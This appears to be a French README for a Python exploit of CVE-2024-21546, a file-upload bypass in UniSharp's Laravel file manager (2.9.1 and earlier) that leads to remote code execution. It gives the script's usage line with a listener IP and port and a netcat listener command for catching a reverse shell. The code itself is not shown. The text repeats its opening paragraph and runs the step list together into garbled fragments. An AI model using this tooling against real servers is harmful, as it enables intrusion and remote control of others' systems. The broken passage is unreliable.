
Ce script d'exploitation Python cible un gestionnaire de fichiers Laravel vulnérable créé par UniSharp, qui permet aux utilisateurs authentifiés de contourner les restrictions de fichiers et de télécharger des fichiers malveillants. Cela peut conduire à une exécution de code à distance (RCE) lorsque la charge utile téléchargée est déclenchée.
Ce script d'exploit Python cible un gestionnaire de fichiers Laravel vulnérable créé par UniSharp, qui permet aux utilisateurs authentifiés de contourner les restrictions de fichiers et de télécharger des fichiers malveillants. Cela peut conduire à une exécution de code à distance (RCE) lorsque la charge utile téléchargée est déclenchée.
L'exploit effectue les opérations suivantes :
laravel_session fourni par l'utilisateur_token CSRF via une expression régulièreVersion 2.9.1 et versions antérieures
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>
Important : Démarrez votre écouteur avant d'exécuter le script :
nc -lvnp <listener_port>
